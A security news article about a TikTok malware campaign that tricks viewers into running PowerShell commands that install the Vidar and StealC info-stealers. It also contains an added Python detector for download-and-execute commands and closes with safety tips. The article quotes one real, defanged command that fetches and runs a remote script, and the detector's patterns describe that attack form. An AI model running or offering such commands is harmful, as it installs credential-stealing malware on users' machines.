New TikTok Scam Lures Users with Pirated Apps, Delivers Stealthy Info-Stealers Instead

A new malicious campaign, uncovered by researchers at Trend Micro, is spreading through TikTok, featuring videos that promise free software but actually lead users to download dangerous malware. This tactic shows how attackers are exploiting popular social media platforms like TikTok to deceive users.

Hackers are posting TikTok videos that claim to show viewers how to get pirated versions of popular software applications. But instead of offering legitimate downloads, they guide users to run hidden commands on their computers that install two harmful programs: Vidar and StealC.

The danger here is that the attack happens outside of TikTok, so there is no malicious code on the platform for typical app, device, or security control tools to detect. The scam relies on viewers following instructions they believe are legitimate.

TikTok is a massive platform with millions of active users, many of whom may trust what they see in videos. The platform’s algorithm helps content go viral, making it an ideal place for cybercriminals to reach a large audience quickly. And with realistic AI-generated voices and automated video production, these scams can be easily scaled and tailored to different audiences.

How Does It Work

These programs are designed to steal personal information, like passwords, credit card numbers, and even cryptocurrency wallet details. The attack doesn’t involve malicious code inside the TikTok videos themselves. Instead, it relies on social engineering, tricking users into running the harmful commands themselves. The chain usually goes like this:

  1. Watch the Video/Content – The video promises free software and tells viewers to open the Windows PowerShell tool.
  2. Run Command & Install – The video gives a PowerShell or terminal command that seems harmless but secretly downloads malware. Once the command is run, the malware (Vidar or StealC) is downloaded and starts stealing personal information.

In one example, a video instructed viewers to run this PowerShell command:

iex (irm hxxps://allaivo[.]me/spotify)

This command, when executed, secretly downloaded a malicious script from an external server and ran it, and that script then installed the Vidar or StealC malware on the unsuspecting victim’s computer. Once installed, these programs start stealing sensitive information like passwords, credit card details, and even cryptocurrency wallet data.
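As an added example (not code from Trend Micro or the original article), the Python below flags command text in which a web download is handed straight to Invoke-Expression, the pattern in the command above. The sample lines and the example.invalid host are constructed, and the input is assumed to be command text taken from PowerShell script block logging (Event ID 4104) or process command lines.

```python
import re

# Commands/aliases that fetch remote content, and those that execute a string.
FETCH = r"(?:irm|iwr|curl|wget|invoke-restmethod|invoke-webrequest|downloadstring)"
EXEC = r"(?:iex|invoke-expression)"
URL = r"h(?:tt|xx)ps?://[^\s'\"()|]+"  # also accepts defanged hxxp(s) notation

PATTERNS = [
    # iex (irm <url>): execution wraps the download (form shown in the article)
    re.compile(rf"\b{EXEC}\b[^|;]*?\b{FETCH}\b[^|;]*?(?P<url>{URL})", re.I),
    # irm <url> | iex: the download is piped into execution
    re.compile(rf"\b{FETCH}\b[^|;]*?(?P<url>{URL})[^|;]*\|\s*{EXEC}\b", re.I),
]

def find_download_exec(command_text):
    """Return the URL that is fetched and executed in one step, or None."""
    for pattern in PATTERNS:
        match = pattern.search(command_text)
        if match:
            return match.group("url")
    return None

def scan(lines):
    """Return (line_number, url) for every line that matches."""
    hits = []
    for number, line in enumerate(lines, start=1):
        url = find_download_exec(line)
        if url:
            hits.append((number, url))
    return hits

# Constructed sample command text (not real log data).
SAMPLE = [
    "iex (irm https://example.invalid/spotify)",
    "irm https://example.invalid/setup.ps1 | iex",
    "Invoke-Expression ((New-Object Net.WebClient)"
    ".DownloadString('https://example.invalid/a'))",
    "irm https://example.invalid/api/status | ConvertTo-Json",  # benign
    "Get-Process | Sort-Object CPU",                            # benign
]

if __name__ == "__main__":
    for number, url in scan(SAMPLE):
        print(f"line {number}: download-and-execute from {url}")
```

This is a plain-text heuristic: encoded or obfuscated commands will not match, so treat a hit as a lead for review rather than a complete detection.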

TikTok may be a fun platform, but just like with any social media, it’s important to stay aware of the risks. Whether you are on TikTok for fun, work, or anything in between, here are some good habits to practice for staying safe:

Be Skeptical of Free Software Offers: If a video promises free or pirated software, it is probably a scam.

Use Trusted Security Tools: Utilize antivirus software on your devices for real-time protection that helps detect and block threats.

Avoid Running Commands/Actions: Don’t run PowerShell or terminal commands, or take other actions on your system, based on random videos or websites, especially if you’re unsure of the source.

Think Before Clicking: If something seems too good to be true, it likely is. Always double-check the legitimacy of offers and instructions you see online.

This new malware campaign shows how hackers are using different platforms to manipulate users into infecting their own devices.

Stay vigilant, protect your personal information, and be cautious when following offers, deals, or online tutorials, especially if they seem too good to be true.

